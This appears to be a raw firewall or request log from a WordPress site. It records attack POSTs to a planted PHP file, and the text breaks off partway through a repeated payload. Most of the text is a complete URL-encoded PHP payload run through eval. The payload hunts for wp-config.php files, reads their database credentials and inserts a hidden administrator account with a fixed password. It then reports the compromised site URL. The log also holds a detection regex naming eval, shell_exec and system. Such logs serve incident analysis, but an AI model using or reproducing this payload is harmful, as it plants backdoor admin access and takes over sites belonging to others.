3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvDJxvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYaOupaEcqTyiovV7nJLbMzyfMI9jqKEsL29hqTIhqUZbWUNfWTZcXKgcozAfqJEyVPEjB0O1ozkcozfbWUNcB2I4nKD7sK19MTyyXPVuoz90q3W0LzjuVvx7; 1=53; 0=71\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"100\", \"Google Chrome\";v=\"100\"\ncontent-type:application\/x-www-form-urlencoded\nsec-ch-ua-mobile:?0\ncontent-length:12640\n\nAi=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 06:03:45","213.209.159.254","POST","\/wp-includes\/sodium_compat\/src\/Core\/Base64\/security.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/17.0 Safari\/605.1.15","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> bRjtVo:eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));","POST \/wp-includes\/sodium_compat\/src\/Core\/Base64\/security.php HTTP\/1.1\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/17.0 Safari\/605.1.15\nsec-fetch-site:none\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\ncontent-type:application\/x-www-form-urlencoded\ncontent-length:12663\nsec-fetch-dest:document\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-fetch-mode:navigate\n\nbRjtVo=eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%2